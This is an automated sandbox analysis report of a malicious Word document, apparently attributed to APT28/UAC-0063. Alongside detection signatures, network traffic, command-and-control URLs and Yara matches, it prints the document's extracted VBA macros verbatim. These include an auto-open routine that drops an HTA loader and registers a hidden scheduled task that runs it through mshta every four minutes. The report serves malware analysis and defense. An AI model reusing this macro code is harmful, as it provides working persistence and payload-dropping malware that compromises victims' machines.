
Windows Analysis Report
RoYAd85faz.doc

Overview

General Information

Sample name: RoYAd85faz.doc (renamed because the original name is a hash value)
Original sample name: ab5685ebf439f61c554977df1e1cd0c3.doc
Analysis ID: 1590274
MD5: ab5685ebf439f61c554977df1e1cd0c3
SHA1: 715724904dfb62a68887fa3d2d6d391b32cbd7b1
SHA256: fd78051817b5e2375c92d14588f9a4ba1adc92cc1564e55e6150ae350ed6c889
Tags: doc, UAC-0063, user-smica83

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected landing page (webpage, office document or email)
Document contains an embedded VBA macro which accesses itself as a binary file (likely for evasion)
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Machine Learning detection for dropped file
Machine Learning detection for sample
Office process queries suspicious COM object (likely to drop second stage)
Detected non-DNS traffic on DNS port
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA which reads its own file name (might be used to evade sandboxes)
Document contains embedded VBA macros
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Yara signature match

Classification

  • System is w11x64_office
  • WINWORD.EXE (PID: 7920 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)
  • WINWORD.EXE (PID: 7680 cmdline: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: A9F0EC89897AC6C878D217DFB64CA752)
  • mshta.exe (PID: 5828 cmdline: "C:\Windows\System32\mshta.exe" C:\Users\user\AppData\Local\Lookup\Dispatch MD5: 36D15DDE6D71802D9588CC0D48EDF8EA)
  • cleanup
No configs have been found
Yara matches (Source / Rule / Description / Author / Strings)

Source: settings.xml
Rule: apt_susp_apt28_uac0063_malicious_doc_settings_xml
Description: Detects some suspected APT28 document settings.xml
Author: Sekoia.io
Strings:
  • 0x3663:$: Call svc.GetFolder(
  • 0x31a1:$: CreateTextFile(appdir

Source: C:\Users\user\AppData\Local\Lookup\Dispatch
Rule: apt_susp_apt28_uac0063_hta_loader
Description: Detects some suspected APT28 HTA loader
Author: Sekoia.io
Strings:
  • 0x0:$: <HEAD><HTA:APPLICATION ID
  • 0xf3:$: script Language="VBScript.Encode

Source: 00000009.00000002.2895883202.0000027C804F0000.00000004.00000800.00020000.00000000.sdmp
Rule: apt_susp_apt28_uac0063_hta_loader
Description: Detects some suspected APT28 HTA loader
Author: Sekoia.io
Strings:
  • 0x0:$: <HEAD><HTA:APPLICATION ID
  • 0xf3:$: script Language="VBScript.Encode

Source: Process Memory Space: mshta.exe PID: 5828
Rule: apt_susp_apt28_uac0063_hta_loader
Description: Detects some suspected APT28 HTA loader
Author: Sekoia.io
Strings:
  • 0x84:$: <HEAD><HTA:APPLICATION ID
  • 0x177:$: script Language="VBScript.Encode
No Sigma rule has matched
Suricata IDS alert (Timestamp / SID / Severity / Classtype / Source IP / Source Port / Destination IP / Destination Port / Protocol)

Timestamp: 2025-01-13T21:38:36.141852+0100
SID: 2057742
Severity: 1
Classtype: A Network Trojan was detected
Source IP: 104.21.84.174
Source Port: 80
Destination IP: 192.168.2.26
Destination Port: 49712
Protocol: TCP


AV Detection

Source: RoYAd85faz.doc | Avira: detected
Source: RoYAd85faz.doc | Virustotal: Detection: 43%
Source: RoYAd85faz.doc | ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\~WRD0000.tmp | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\~WRD0001.tmp | Joe Sandbox ML: detected
Source: RoYAd85faz.doc | Joe Sandbox ML: detected

Phishing

Source: Screenshot id: 18 | Joe Sandbox AI: Page contains button: 'Download' Source: 'Screenshot id: 18'
Source: Screenshot id: 18 | Joe Sandbox AI: Screenshot id: 18 contains prominent button: 'download'
Source: Screenshot id: 17 | Joe Sandbox AI: Page contains button: 'Download' Source: 'Screenshot id: 17'
Source: Screenshot id: 17 | Joe Sandbox AI: Screenshot id: 17 contains prominent button: 'download'
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll
Source: global traffic | DNS query: name: lookup.ink
Source: global traffic | DNS query: name: browser.events.data.msn.cn
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 192.168.2.26:49712 -> 104.21.84.174:80
Source: global traffic | TCP traffic: 192.168.2.26:62334 -> 1.1.1.1:53
Source: global traffic | TCP traffic: 1.1.1.1:53 -> 192.168.2.26:62334
Source: global traffic | TCP traffic: 192.168.2.26:62334 -> 1.1.1.1:53
Source: global traffic | TCP traffic: 1.1.1.1:53 -> 192.168.2.26:62334
Source: global traffic | TCP traffic: 192.168.2.26:62334 -> 1.1.1.1:53
Source: global traffic | TCP traffic: 1.1.1.1:53 -> 192.168.2.26:62334
Source: global traffic | TCP traffic: 192.168.2.26:62334 -> 1.1.1.1:53

Networking

Source: Network traffic | Suricata IDS: 2057742 - Severity 1 - ET MALWARE TA426/Zebrocy Hatvibe CnC Server Response M1 : 104.21.84.174:80 -> 192.168.2.26:49712
Source: global traffic | TCP traffic: 192.168.2.26:62334 -> 1.1.1.1:53
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: lookup.ink
Source: global traffic | DNS traffic detected: DNS query: browser.events.data.msn.cn
Source: mshta.exe, 00000009.00000003.2581750842.0000027C81A2E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.in
Source: mshta.exe, 00000009.00000002.2898991106.0000027C81A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2906582266.0000027CDC983000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/
Source: mshta.exe, 00000009.00000002.2899934649.0000027C831B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2906582266.0000027CDC918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.2317903271.0000027C81A38000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/lookup.php
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/lookup.php-
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/lookup.php-B
Source: mshta.exe, 00000009.00000002.2899934649.0000027C831B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/lookup.phpC
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/lookup.phpH
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/lookup.phpN
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/lookup.phpV
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/lookup.phpc
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/lookup.phpy
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2901755666.0000027C83475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2898991106.0000027C81A2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2906582266.0000027CDC969000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2898991106.0000027C81A27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.2581783335.0000027C81A2A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/match.php
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/match.php$/
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/match.php-11CE-8C82-00AA004BA90B
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/match.php=8
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/match.phpA
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/match.phpL
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/match.phpMp
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/match.phpOnly
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/match.phpj
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DE9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/match.phps
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.ink/match.phpy
Source: mshta.exe, 00000009.00000002.2899934649.0000027C831B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lookup.inktT
Source: mshta.exe, 00000009.00000002.2902510602.0000027C83DD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com

System Summary

Source: settings.xml, type: SAMPLE | Matched rule: Detects some suspected APT28 document settings.xml Author: Sekoia.io
Source: 00000009.00000002.2895883202.0000027C804F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects some suspected APT28 HTA loader Author: Sekoia.io
Source: Process Memory Space: mshta.exe PID: 5828, type: MEMORYSTR | Matched rule: Detects some suspected APT28 HTA loader Author: Sekoia.io
Source: C:\Users\user\AppData\Local\Lookup\Dispatch, type: DROPPED | Matched rule: Detects some suspected APT28 HTA loader Author: Sekoia.io
Source: RoYAd85faz.doc | OLE, VBA macro line: tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp") & "\" & ActiveDocument.Name & ".doc"
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function documeNt_opEn, String environ: tmp = wsl.ExpandEnvironmentStrings("%localapp" & "data%\T" & "emp") & "\" & ActiveDocument.Name & ".doc" | Name: documeNt_opEn
Source: ~WRD0001.tmp.7.dr | OLE, VBA macro line: Sub baads(): On Error Resume Next: Set svc = CreateObject("Schedule.Service"): Call svc.Connect: Set td = svc.NewTask(0): Set sets = td.settings: sets.Enabled = True: sets.Hidden = True: Set tr = td.triggers.Create(1): tr.StartBoundary = Year(Now) & "-" & Right("0" & Month(Now), 2) & "-" & Right("0" & Day(Now), 2) & "T" & Right("0" & Hour(Now), 2) & ":" & Right("0" & Minute(Now), 2) & ":" & Right("0" & Second(Now), 2): tr.Enabled = True: tr.Repetition.Interval = "PT4M": Set act = td.Actions.Create(0): act.Path = "C:\Windows\System32\mshta.exe": act.Arguments = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Lookup\Dispatch": Call svc.GetFolder("\").RegisterTaskDefinition("Lookup\Dispatch", td, 6, , , 3): End Sub
Source: ~WRD0001.tmp.7.dr | OLE, VBA macro line: Sub goods(): On Error Resume Next: Set fso = CreateObject("Scripting.FileSystemObject"): appdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") & "\Lookup": fso.CreateFolder (appdir): Set OutPutFile = fso.CreateTextFile(appdir & "\Dispatch", True): For j = 1 To Documents(1).Variables.Count - 3: vars = Documents(1).Variables(j): For i = 1 To Len(vars): OutPutFile.Write Chr("&H" & Mid(vars, i, 2)): i = i + 1: Next: Next: OutPutFile.Close: End Sub
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function documeNt_opEn, String ThisDocument
Source: RoYAd85faz.doc | Stream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions environment, expandenvironmentstrings, regwrite, environ
Source: ~WRD0000.tmp.0.dr | Stream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions environment, expandenvironmentstrings, regwrite, environ
Source: ~WRD0001.tmp.7.dr | Stream path 'VBA/ThisDocument' : found possibly 'WScript.Shell' functions environment, expandenvironmentstrings, environ
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: RoYAd85faz.doc | OLE, VBA macro line: Sub documeNt_opEn()
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function documeNt_opEn | Name: documeNt_opEn
Source: ~WRD0000.tmp.0.dr | OLE, VBA macro line: Private Function JbxHook_Open_1__ob_set(jbxline, ByRef jbxthis, ByRef jbxparam0)
Source: ~WRD0000.tmp.0.dr | OLE, VBA macro line: Static jbxtresh_Open As Integer
Source: ~WRD0000.tmp.0.dr | OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0000.tmp.0.dr | OLE, VBA macro line: Set JbxHook_Open_1__ob_set = jbxthis.Open(jbxparam0)
Source: ~WRD0000.tmp.0.dr | OLE, VBA macro line: If jbxtresh_Open < 200 Then
Source: ~WRD0000.tmp.0.dr | OLE, VBA macro line: jbxtresh_Open = jbxtresh_Open + 1
Source: ~WRD0000.tmp.0.dr | OLE, VBA macro line: JbxLogParam "jbxreturn", JbxHook_Open_1__ob_set
Source: ~WRD0000.tmp.0.dr | OLE, VBA macro line: Set doc2 = JbxHook_Open_1__ob_set(14, objApp.Documents, namedoc)
Source: ~WRD0000.tmp.0.dr | OLE, VBA macro line: Sub documeNt_opEn()
Source: ~WRD0000.tmp.7.dr | OLE, VBA macro line: Sub docUment_oPen()::: ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block1ergegdr"):: ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block2ergegdr"):: goods: baads: Me.Close: End Sub
Source: ~WRD0001.tmp.7.dr | OLE, VBA macro line: Sub docUment_oPen()::: ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block1ergegdr"):: ActiveDocument.VBProject.VBComponents(1).CodeModule.AddFromString ActiveDocument.Variables.Item("block2ergegdr"):: goods: baads: Me.Close: End Sub
Source: RoYAd85faz.doc | OLE indicator, VBA macros: true
Source: ~WRD0000.tmp.0.dr | OLE indicator, VBA macros: true
Source: ~WRD0000.tmp.7.dr | OLE indicator, VBA macros: true
Source: ~WRD0001.tmp.7.dr | OLE indicator, VBA macros: true
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: settings.xml, type: SAMPLE | Matched rule: apt_susp_apt28_uac0063_malicious_doc_settings_xml author = Sekoia.io, description = Detects some suspected APT28 document settings.xml, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = fd104985-6441-4fb6-8cc1-30afa4a7797b, hash = 0272acc6ed17c72320e4e7b0f5d449841d0ccab4ea89f48fd69d0a292cc5d39a
Source: 00000009.00000002.2895883202.0000027C804F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: apt_susp_apt28_uac0063_hta_loader author = Sekoia.io, description = Detects some suspected APT28 HTA loader, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = 8e1889c1-c6ac-4048-9d3a-99ccbbd5435f, hash = 332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725
Source: Process Memory Space: mshta.exe PID: 5828, type: MEMORYSTR | Matched rule: apt_susp_apt28_uac0063_hta_loader author = Sekoia.io, description = Detects some suspected APT28 HTA loader, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = 8e1889c1-c6ac-4048-9d3a-99ccbbd5435f, hash = 332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725
Source: C:\Users\user\AppData\Local\Lookup\Dispatch, type: DROPPED | Matched rule: apt_susp_apt28_uac0063_hta_loader author = Sekoia.io, description = Detects some suspected APT28 HTA loader, creation_date = 2024-07-25, classification = TLP:CLEAR, version = 1.0, id = 8e1889c1-c6ac-4048-9d3a-99ccbbd5435f, hash = 332d9db35daa83c5ad226b9bf50e992713bc6a69c9ecd52a1223b81e992bc725
Source: classification engine | Classification label: mal100.expl.evad.winDOC@5/12@2/1
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\Desktop\~$YAd85faz.doc
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{254984DD-A5F0-483A-BC8C-8C5E3D2132AD} - OProcSessId.dat
Source: RoYAd85faz.doc | OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr | OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.7.dr | OLE indicator, Word Document stream: true
Source: ~WRD0001.tmp.7.dr | OLE indicator, Word Document stream: true
Source: RoYAd85faz.doc | OLE document summary: title field not present or empty
Source: RoYAd85faz.doc | OLE document summary: edited time not present or 0
Source: ~WRD0000.tmp.0.dr | OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.dr | OLE document summary: edited time not present or 0
Source: ~WRD0000.tmp.7.dr | OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.7.dr | OLE document summary: edited time not present or 0
Source: ~WRD0001.tmp.7.dr | OLE document summary: title field not present or empty
Source: ~WRD0001.tmp.7.dr | OLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RoYAd85faz.doc | Virustotal: Detection: 43%
Source: RoYAd85faz.doc | ReversingLabs: Detection: 34%
Source: unknown | Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: unknown | Process created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: unknown | Process created: C:\Windows\System32\mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\user\AppData\Local\Lookup\Dispatch
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process created: unknown unknown
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process created: unknown unknown
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: virtdisk.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: directxdatabasehelper.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: gpapi.dll
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Window found: window name: SysTabControl32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | File opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dll
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
